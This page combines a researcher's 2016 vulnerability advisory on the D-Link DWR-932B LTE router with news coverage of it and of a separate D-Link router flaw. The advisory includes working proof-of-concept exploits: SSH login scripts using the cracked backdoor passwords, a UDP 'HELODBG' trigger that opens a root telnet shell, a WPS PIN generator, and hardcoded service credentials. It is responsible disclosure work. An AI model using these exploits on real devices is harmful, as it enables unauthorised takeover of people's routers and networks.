DLink

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

## Advisory Information

Title: Multiple vulnerabilities found in the Dlink DWR-932B (backdoor,
backdoor accounts, weak WPS, RCE ...)
Advisory URL: https://pierrekim.github.io/advisories/2016-dlink-0x00.txt
Blog URL: https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
Date published: 2016-09-28
Vendors contacted: Dlink
Release mode: Released
CVE: no current CVE
DWF: no current DWF

## Product Description

Dlink is a multinational networking equipment manufacturing corporation.

## Vulnerabilities Summary

The Dlink DWR-932B is a LTE router / access point overall badly
designed with a lot of vulnerabilities.
It's available in a number of countries to provide Internet with a LTE network.
It's a model based on the (in)famous Quanta LTE router models and
inherits some vulnerabilities.

The tests below are done using the latest available firmware (firmware
DWR-932_fw_revB_2_02_eu_en_20150709.zip,
model revision B,
/Share3/DailyBuild/QDX_DailyBuild/QDT_2031_DLINK/QDT_2031_OS/source/LINUX/apps_proc/oe-core/build/tmp-eglibc/sysroots/x86_64-linux/usr/bin/armv7a-vfp-neon-oe-linux-gnueabi/arm-oe-linux-gnueabi-gcc).

The summary of the vulnerabilities is:

- Backdoor accounts
- Backdoor
- Default WPS PIN
- Weak WPS PIN Generation - with a reverse-engineered algorithm
- Leaking No-IP account (?)
- Multiple vulnerabilities in the HTTP daemon (qmiweb)
- Remote FOTA (Firmware Over The Air)
- Bad security practices
- Security removed in UPnP

A personal point of view: at best, the vulnerabilites are due to
incompetence; at worst, it is a deliberate act of security sabotage
from the vendor. Not all the vulnerabilities found have been disclosed
in this advisory. Only the significant ones are shown.

This router is still on sale.

Due to lack of security patches provided by the vendor, the
vulnerabilities will remain unpatched and customers with questions
should contact their local/regional D-Link support office for the
latest information.

## Details - Backdoor accounts

By default, telnetd and SSHd are running in the router.

Telnetd is running even if there is no documentation about it:

[email protected]:~$ cat ./etc/init.d/start_appmgr

[...]
#Sandro for telnetd debug...
start-stop-daemon -S -b -a /bin/logmaster
#if [ -e /config2/telnetd ]; then
start-stop-daemon -S -b -a /sbin/telnetd
#fi
#Sandro
[...]

2 backdoor accounts exist and can be used to bypass the HTTP
authentication used to manage the router.

[email protected]:~$ grep admin /etc/passwd
admin:htEcF9TWn./9Q:168:168:admin:/:/bin/sh
[email protected]:~$

The password for admin is 'admin' and can be found in the /bin/appmgr
program using IDA:

About the root user:

[email protected]:~$ cat ./etc/shadow
root:aRDiHrJ0OkehM:16270:0:99999:7:::
daemon:*:16270:0:99999:7:::
bin:*:16270:0:99999:7:::
sys:*:16270:0:99999:7:::
sync:*:16270:0:99999:7:::
games:*:16270:0:99999:7:::
man:*:16270:0:99999:7:::
lp:*:16270:0:99999:7:::
mail:*:16270:0:99999:7:::
news:*:16270:0:99999:7:::
uucp:*:16270:0:99999:7:::
proxy:*:16270:0:99999:7:::
www-data:*:16270:0:99999:7:::
backup:*:16270:0:99999:7:::
list:*:16270:0:99999:7:::
irc:*:16270:0:99999:7:::
gnats:*:16270:0:99999:7:::
diag:*:16270:0:99999:7:::
nobody:*:16270:0:99999:7:::
messagebus:!:16270:0:99999:7:::
avahi:!:16270:0:99999:7:::
[email protected]:~$

Using john to crack the hashes:

[email protected]:~$ john -show shadow+passwd
admin:admin:admin:/:/bin/sh
root:1234:16270:0:99999:7:::

2 password hashes cracked, 0 left
[email protected]:~$

Results:

- admin has password admin
- root has password 1234

Working exploit for admin:

[email protected]:~$ cat quanta-ssh-default-password-admin
#!/usr/bin/expect -f

set timeout 3
spawn ssh [email protected]
expect "password: $ "
send "admin\r"
interact
[email protected]:~$ ./quanta-ssh-default-password-admin
spawn ssh [email protected]
[email protected]'s password:
[email protected]:~$ id
uid=168(admin) gid=168(admin) groups=168(admin)
[email protected]:~$

Alternatively, you can fetch it at
https://pierrekim.github.io/advisories/quanta-ssh-default-password-admin.

Working exploit for root:

[email protected]:~$ cat quanta-ssh-default-password-root
#!/usr/bin/expect -f

set timeout 3
spawn ssh [email protected]
expect "password: $ "
send "1234\r"
interact
[email protected]:~$ ./quanta-ssh-default-password-root
spawn ssh [email protected]
[email protected]'s password:
[email protected]:~# id
uid=168(root) gid=168(root) groups=168(root)
[email protected]:~#

Alternatively, you can fetch it at
https://pierrekim.github.io/advisories/quanta-ssh-default-password-root.

## Details - Backdoor

A backdoor is present inside the `/bin/appmgr` program. By sending a
specific string in UDP to the router, an authentication-less telnet
server will start if a telnetd daemon is not already running.

In `/bin/appmgr`, a thread listens to 0.0.0.0:39889 (UDP) and waits
for commands.

If a client sends "HELODBG" to the router, the router will execute
`/sbin/telnetd -l /bin/sh`, allowing to access without authentication
to the router as root.

When using IDA, we can see the backdoor is located in the main
function (line 369):

[please visit the HTML version at
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
to see the image]

Working PoC :

[email protected]:~$ echo -ne "HELODBG" | nc -u 192.168.1.1 39889
Hello
^C
[email protected]:~$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

OpenEmbedded Linux homerouter.cpe

msm 20141210 homerouter.cpe

/ # id
uid=0(root) gid=0(root)
/ # exit
Connection closed by foreign host.
[email protected]:~$

## Details - Default WPS PIN

Wi-Fi Protected Setup(WPS) is a standard for easy and secure
establishment of a wireless home network, as defined in the
documentation provided in the router (help.html).

By default, the PIN for the WPS system is ever 28296607. It is, in
fact, hardcoded in the /bin/appmgr program:

This PIN can be found in the HostAP configuration too, and, using the
information leak, in the HTTP APIs of the router:

[email protected]:~# ps -a|grep hostap
1006 root 0:00 hostapd /var/wifi/ar6k0.conf
1219 root 0:00 grep hostap
[email protected]:~# cat /var/wifi/ar6k0.conf
[...]
ap_pin=28296607
[...]

## Details - Weak WPS PIN Generation - with a reverse-engineered algorithm

An user can use the webinterface to generate a temporary PIN for the
WPS system (low probability as the 28296607 WPS PIN is provided by
default).

The PIN generated by the router is weak as it is generated using this
"strange" reverse-engineered algorithm:

[email protected]:~$ cat quanta-wps-gen.c

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main(int argc,
char **argv,
char **envp)
{
unsigned int i0, i1;
int i2;

/* the seed is the current time of the router, which uses NTP... */
srand(time(0));

i0 = rand() % 10000000;
if (i0 <= 999999)
i0 += 1000000;
i1 = 10 * i0;
i2 = (10 - (i1 / 10000 % 10 + i1 / 1000000 % 10 + i1 / 100 % 10 + 3 *
(i1 / 100000 % 10 + 10 * i0 / 10000000 % 10 + i1 / 1000 %
10 + i1 / 10 % 10))
% 10) % 10 + 10 * i0;

printf("%d\n", i2 );

return (0);
}

[email protected]:~$ gcc -o dlink-wps-gen quanta-wps-gen.c
[email protected]:~$ ./dlink-wps-gen
97329329
[email protected]:~$

You can fetch this program at
https://pierrekim.github.io/advisories/quanta-wps-gen.c.

Using `srand(time(0))` as a seed is a bad idea because an attacker,
knowing the current date as `time(0)` returns the current date in an
integer value, can just generate the valid WPS PIN. The Router uses
NTP so is likely to have a correct timestamp configured. It's trivial
for an attacker to generate valid WPS PIN suites and bruteforce them.

For the curious reader, the original algorithm in the firmware is:

[please visit the HTML version at
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
to see this long content]

## Details - Leaking No-IP account (?):

The file `/etc/inadyn-mt.conf` (for a dyndns client) contains an user
and a hardcoded password:

--log_file /usr/inadyn_srv.log
--forced_update_period 6000
--username alex_hung
--password 641021
--dyndns_system [email protected]
--alias test.no-ip.com

## Details - Multiple vulnerabilities in the HTTP daemon (qmiweb)

The HTTP daemon `/bin/qmiweb` is full of vulnerabilities.

You can see my precedent researches about a router model using a
similar firmware:

- https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilities.html#webinterface-information-leak
- https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilities.html#rce-1
- https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilities.html#rce-2
- https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilities.html#arbitrary-file-browsing-using-the-http-daemon
- https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilities.html#arbitrary-file-reading-using-the-http-daemon

Adapting the exploits is left as exercises for the reader 🙂

## Details - Remote FOTA (Firmware Over The Air)

The credentials to contact the FOTA server are hardcoded in the
`/sbin/fotad` binary, as shown with this IDA screenshot:

[please visit the HTML version at
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
to see the image]

The function sub_CAAC contains the credentials as base64-strings, used
to retrieve the firmware.

It's notable the FOTA daemon tries to retrieve the firmware over
HTTPS. But at the date of the writing, the SSL certificate for
https://qdp:[email protected]/qdh/ispname/2031/appliance.xml is
invalid for 1.5 year.

[please visit the HTML version at
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
to see the image]

The user/password combinations are:

qdpc:qdpc
qdpe:qdpe
qdp:qdp

## Details - Bad security practices:

- From `/etc/init.d/start_appmgr`, you will read "strange" shell
commands executed as root, like:

if [ -f /sbin/netcfg ]; then
echo -n "chmod 777 netcfg"
chmod 777 /sbin/netcfg
fi
if [ -f /bin/QNetCfg ]; then
echo -n "chmod 777 QNetCfg"
chmod 777 /bin/QNetCfg
fi

I have no idea why the vendor needs to chmod 777 files located in /bin/.

## Details - Security removed in UPnP

UPnP allows to add firewall rules dynamically. Because of the security
risks involved, generally there are restrictions in place to avoid
dangerous new firewall rules from an unstrusted LAN client.

Insecurity in IPnP was hype 10 years ago (in 2006). The security level
of the UPNP program (miniupnp) in this router is volountarily lowered
as shown below and allows an attacker located in the LAN area to add
Port forwarding from the Internet to other clients located in the LAN:

The `/var/miniupnpd.conf` is generated by the `/bin/appmgr` program:

[please visit the HTML version at
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
to see the image]

It will generate the /var/miniupnpd.conf file:

ext_ifname=rmnet0
listening_ip=bridge0
port=2869
enable_natpmp=yes
enable_upnp=yes
bitrate_up=14000000
bitrate_down=14000000
secure_mode=no # "secure" mode : when enabled, UPnP client
are allowed to add mappings only to their IP.
presentation_url=http://192.168.1.1
system_uptime=yes
notify_interval=30
upnp_forward_chain=MINIUPNPD
upnp_nat_chain=MINIUPNPD

There is no restriction about the UPnP permission rules in the
configuration file, contrary to common usage in UPnP where it is
advised to only allow redirection of port above 1024:

Normal config file:

# UPnP permission rules
# (allow|deny) (external port range) ip/mask (internal port range)
# A port range is <min port>-<max port> or <port> if there is only
# one port in the range.
# ip/mask format must be nn.nn.nn.nn/nn
# it is advised to only allow redirection of port above 1024
# and to finish the rule set with "deny 0-65535 0.0.0.0/0 0-65535"
allow 1024-65535 192.168.0.0/24 1024-65535
deny 0-65535 0.0.0.0/0 0-65535

In the configuration of the vulnerable router where there are no
permission rules, an attacker can forward everything from the WAN into
the LAN. For example, an attacker can add a forwarding rule in order
to allow traffic from the Internet to local Exchange servers, mail
servers, ftp servers, http servers, database servers... In fact, this
lack of security allows a local user to forward whatever they want
from the Internet into the LAN.

## Personal notes

As the router has a sizable memory (168 MB), a decent CPU and good
free space (235 MB) with complete toolkits installed by default (sshd,
proxy (/bin/tinyproxy -c /var/tproxy.conf), tcpdump ...), I advise
users to trash their routers because it's trivial for an attacker to
use this router as an attack vector (ie: hosting a sniffing tool, LAN
hacking, active MiTM tool, spamming zombie).

- From my tests, it is possible to overwrite the firmware with a
custom (backdoored) firmware. Generating a valid backdoored firmware
is left as an exercise for the reader, but with all these
vulnerabilities present in the default firmware, I don't think it is
worth making the effort.

## Vendor Response

Customers with questions should contact their local/regional D-Link
support offices for the latest information.

## Report Timeline

* Dec 04, 2015: Vulnerabilities found by Pierre Kim in Quanta routers.
* Apr 04, 2016: A public advisory about Quanta routers is sent to
security mailing lists.
* Jun 09, 2016: Pierre Kim is contacted by Gianni Carabelli about
Dlink DWR-932 router's similarities to Quanta routers.
* Jun 14, 2016: Pierre Kim thanks Gianni Carabelli and says he will
contact Dlink.
* Jun 15, 2016: Dlink is contacted about vulnerabilities in the
DWR-932 router (=~ 20 vulns).
* Jun 16, 2016: Dlink Security Incident Response Team (William Brown)
acknowledges the receipt of the report and says they will provide
further updates.
* Jul 09, 2016: Pierre asks for updates.
* Jul 09, 2016: Dlink says they will have correction by July 15.
* Jul 19, 2016: Pierre asks for updates.
* Aug 19, 2016: Pierre asks for updates.
* Sep 12, 2016: Pierre asks for updates and says he will soon release
an advisory as 90 days have passed without news.
* Sep 12, 2016: [email protected] is contacted to get pieces of advice
about the disclosure.
* Sep 13, 2016: CERT recommends to try to contact D-link and to
publish the advisory.
* Sep 13, 2016: Dlinks says they don't have a schedule for a firmware
release. Customers who have questions should contact their
local/regional D-Link support offices for the latest information.
support.dlink.com will be updated in the next 24 hours.
* Sep 28, 2016: A public advisory is sent to security mailing lists.

## Credits

These vulnerabilities were found by Pierre Kim (@PierreKimSec).

I would like to thank Gianni Carabelli who found this router and
thought it was very similar to the previous backdoored Quanta routers.

## References

https://pierrekim.github.io/advisories/2016-dlink-0x00.txt

https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html

https://www.linkedin.com/pulse/rooting-dlink-dwr-923-4g-router-gianni-carabelli

## Disclaimer

This advisory is licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 License:
http://creativecommons.org/licenses/by-nc-sa/3.0/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJX6qMQAAoJEMQ+Dtp9ky28YaoQALOfDQtF2gYqqLHVBADCVZRC
pBvCNWHrfEcHbMr0bWVvTGQ9/sOjmX+D76GWs4fc/Jl2REORrcg6GR0QM5L0N1O8
GWgLH2O82RR/YweXtNXaIhkZGizFALlmMxav9Pey/FzAYMajCnaSiodyaTrD5+B1
1dBRp//zfNhQ5cTl70baRdTLhzZaNBMKkyBHjJ+uYuP/0itBcYak7OhpqyAzYkF8
s8vyjbTjsG/An19N3jLLDemVLlQvgMTHcqIwvu+FW1Gpx6q39izyZAXv+iXxIUtW
qW+cfMfRooqTo6wGSuH/NO5dfFRdvMIsoVE5GMZqJTcPg2SXbZNdsRQSUrwTV2T0
uHMZO1xMg6WWez6/OaRnGvveSkAPlR0v5KIoyH7nw3Gfg4V63GxCPgrguKUBbMXV
e2cc3ixPOD74UTyIHdqROmDwebHVcHV2tPphFJJRLXQ8WPTB8aJIJEVU82tCZSoh
Uot+B1rorXzTXEjRPoxqO9kuxYj5ZtVVUJPn8NA2Bm284lolDUYbq8qwAeH1X3MI
Fd9bQ+R4CsKDKx1vWGu5uMATqk1VQoRnERDIbvngkR5/vjZtl2soMViHcDV4nqxl
k9lohd8q7BjcPWVkFadFHKvfLv9lHrXdxMTPv9Wug1VOYRlm1GzVh7F7jT+zi2a8
2ikFUEGjc5+RXNQLLiZF
=z06Q
-----END PGP SIGNATURE-----


Exploit Files ≈ Packet Storm

Vulnerabilities, Backdoor Found in D-Link DWR-932B LTE Router

Security researchers have discovered numerous unpatched security vulnerabilities in the D-Link DWR-932B LTE router / access point, including backdoor accounts and default Wi-Fi Protected Setup (WPS) PIN.

The device is being sold in various countries and appears to be customers’ security nightmare because of the numerous security weaknesses. The vulnerabilities were discovered by Pierre Kim, who decided to reveal only the most significant of them, and who says that the issues affect even the latest firmware version released by the vendor.

Earlier this year, Kim disclosed numerous unpatched vulnerabilities affecting the LTE QDH routers made by Quanta, including backdoors, hardcoded PIN, flaws in the web interface, remote code execution issue, and other bugs. The flaws that impact D-Link’s router are similar to those found in Quanta’s device, it seems.

The researcher discovered two backdoor accounts on the device and says that they can be used to bypass the HTTP authentication used to manage the router. There is an “admin” account with password “admin,” as well as a “root” account, with password “1234.” By default, telnetd and SSHd are running on D-Link DWR-932B, yet the latter isn’t documented, the researcher also explains.

Next, there is a backdoor inside the /bin/appmgr program, which allows an attacker to send a specific string in UDP to the router to start an authentication-less telnet server (if a telnetd daemon is not already running). The issue is that the router listens to 0.0.0.0:39889 (UDP) for commands and that it allows access without authentication as root if “HELODBG” is received as command.

D-Link DWR-932B also comes with 28296607 as the default WPS PIN, and has it hardcoded in the /bin/appmgr program. The HostAP configuration contains the PIN as well, and so do the HTTP APIs. What’s more, although the router allows the user to generate a temp PIN for the WPS system, the PIN is weak and uses an algorithm leveraging srand(time(0)) as seed. An attacker knowing the current date as time(0) can generate valid WPS PIN suites and brute-force them, the researcher explains.

Kim also reveals that the file /etc/inadyn-mt.conf contains a user and a hardcoded password, and that the HTTP daemon /bin/qmiweb contains multiple vulnerabilities as well. The router also executes strange, purposeless shell commands as root.

Furthermore, the router supports remote FOTA (Firmware Over The Air) and contains the credentials to contact the server hardcoded in the /sbin/fotad binary, as base64-strings. The researcher discovered that, although the FOTA daemon tries to retrieve the firmware over HTTPS, the SSL certificate has been invalid for one year and a half.

The researcher also reveals that the security level of the UPNP program (miniupnp) in the router is lowered, which allows an attacker located in the LAN area to add Port forwarding from the Internet to other clients located in the LAN. “There is no restriction about the UPnP permission rules in the configuration file, contrary to common usage in UPnP where it is advised to only allow redirection of port above 1024,” Kim notes.

Because of this lack of permission rules, an attacker can forward everything from the WAN into the LAN, the researcher says. This means that they can set rules to allow traffic from the Internet to local Exchange servers, mail servers, FTP servers, HTTP servers, database servers, and the like.

An attacker can overwrite the router’s firmware with a custom firmware if they wanted to, “but with all these vulnerabilities present in the default firmware, I don't think it is worth making the effort,” Kim says. He also notes that, because the device has a sizable memory (168 MB), a decent CPU, and good free space (235 MB), along with complete toolkits installed by default, users should consider trashing it, “because it's trivial for an attacker to use this router as an attack vector.”

D-Link was informed on these issues in June, but the company failed to resolve them until now. Because 90 days have passed since the vulnerabilities were disclosed to the vendor, Kim decided to publish an advisory to reveal these bugs.

This is not the first time D-Link products have made it to the headline due to security vulnerabilities. The company patched a critical flaw in several DIR model routers in August, after a popular D-Link Wi-Fi camera was found in June to be affected by a serious flaw that was subsequently discovered in over 120 D-Link products.

view counter

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

Tags:


SecurityWeek RSS Feed

Security researcher Pierre Kim has unearthed a bucketload of vulnerabilities affecting the LTE router/portable wireless hotspot D-Link DWR-932. Among these are backdoor accounts, weak default PINs, and hardcoded passwords.

D-Link DWR-932

Kim went searching for them after he previously poked around some Quanta LTE routers and also found a huge number of flaws, and a D-Link DWR-932 user noted that the two router types have many similarities.

In fact, he says that D-Link’s router is based on the Quanta models, and inherited some of the vulnerabilities.

The documented D-Link DWR-932 vulnerabilities affect the latest available firmware. Kim first responsibly disclosed them to the D-Link Security Incident Response Team in June, but after the company said early this month that they don’t have a schedule for a firmware release, he decided to go public with the details about some of the flaws.

In short, the firmware sports:

  • Two backdoor accounts with easy-to-guess passwords that can be used to bypass the HTTP authentication used to manage the router
  • A default, hardcoded Wi-Fi Protected Setup (WPS) PIN, as well as a weak WPS PIN generation algorithm
  • Multiple vulnerabilities in the HTTP daemon
  • Hardcoded remote Firmware Over The Air credentials
  • Lowered security in Universal Plug and Play, and more.

“At best, the vulnerabilites are due to incompetence; at worst, it is a deliberate act of security sabotage from the vendor,” says Kim, and advises users to stop using the device until adequate fixes are provided.

“As the router has a sizable memory (168 MB), a decent CPU and good free space (235 MB) with complete toolkits installed by default (sshd, proxy, tcpdump …), I advise users to trash their routers because it’s trivial for an attacker to use this router as an attack vector (ie: hosting a sniffing tool, LAN hacking, active MiTM tool, spamming zombie),” he noted.

The router is still being sold and used around the world.


Help Net Security

If you've got a D-Link DWR-932 B LTE router, you might want to fire it into the sun – or hope that a firmware upgrade lands soon.

Following the consumer broadband industry's consistently lackadaisical attitude to security, the device suffers from everything from backdoor accounts to default credentials, leaky credentials, firmware upgrade vulns and insecure UPnP.

Pierre Kim outlines the litany of SOHOpelessness here, noting that many of the vulns are inherited from the Quanta LTE device that forms the basis of the badge-engineered marvel.

The messes Kim found include:

  • SSH and the telnet daemon are enabled by default, with two backdoor accounts (admin:admin, and root:1234);
  • If an attacker sends a crafted UDP string to the appmgr program, it will launch telnetd;
  • The Wi-Fi Protected Setup (WPS) has a hard-coded PIN (28296607);
  • Should a user decide to generate a different temporary WPS PIN, Kim writes, it's a weak PIN because it's based on srand(time(0));
  • The HTTP daemon, qmiweb is a horror that inherits five vulnerabilities from the Quanta device;
  • Its remote firmware over-the-air update mechanism uses hardcoded credentials (qdpc:qdpc, qdpe:qdpe and qdp:qdp); and
  • For the full set of steak knives: the UPnP configuration allows any user on the LAN to add their own port forwarding rules.

There's more, but the killer Kim points out is that the router has a big processor and lots of memory, and is so badly secured it would be trivial to recruit it into a botnet.

Kim says he contacted D-Link in June, and with no update forthcoming, he says he obtained CERT's advice to publish the vulns. ®

Sponsored: Boost business agility and insight with flash storage for analytics


The Register - Security

Taiwan-based networking equipment manufacturer D-Link has released firmware updates for several of its DIR model routers to address a serious vulnerability discovered by a researcher.

The flaw, identified by Daniel Romero, is a stack-based buffer overflow in a function responsible for validating session cookies. The affected function is used by a service that could be exposed to the WAN network on port 8181. A remote or a local attacker may be able to exploit the vulnerability for arbitrary code execution.

The security hole, tracked as CVE-2016-5681, has been confirmed to impact the following D-Link routers: DIR-850L B1, DIR-822 A1, DIR-823 A1, DIR-895L A1, DIR-890L A1, DIR-885L A1, DIR-880L A1, DIR-868L B1, DIR-868L C1, DIR-817L(W) and DIR-818L(W).

The CERT Coordination Center (CERT/CC) has assigned this vulnerability a CVSS score of 9.3, which puts it in the “critical impact” category.

D-Link said in an advisory that it has released firmware updates for most of the affected router models, except DIR-817 Rev. Ax and DIR-818L Rev. Bx. Patches for these devices will be made available by the end of August.

Since D-Link home and small business routers are highly popular, they are often analyzed by security researchers. The company released firmware updates for several of its products last year, but not all vulnerabilities were patched properly on the first try.

Routers are not the only products found to be vulnerable to hacker attacks. In June, IoT security startup Senrio revealed that it had found a serious flaw in a popular D-Link Wi-Fi camera. After a detailed analysis of the issue, the vendor discovered that the bug affects more than 120 of its products, including access points, modems, routers, connected home products and storage solutions.

Related Reading: Flaws in Ruckus Access Points Expose Organizations to Attacks

Related Reading: D-Link Accidentally Publishes Private Keys Online

view counter

Previous Columns by Eduard Kovacs:

Tags:


SecurityWeek RSS Feed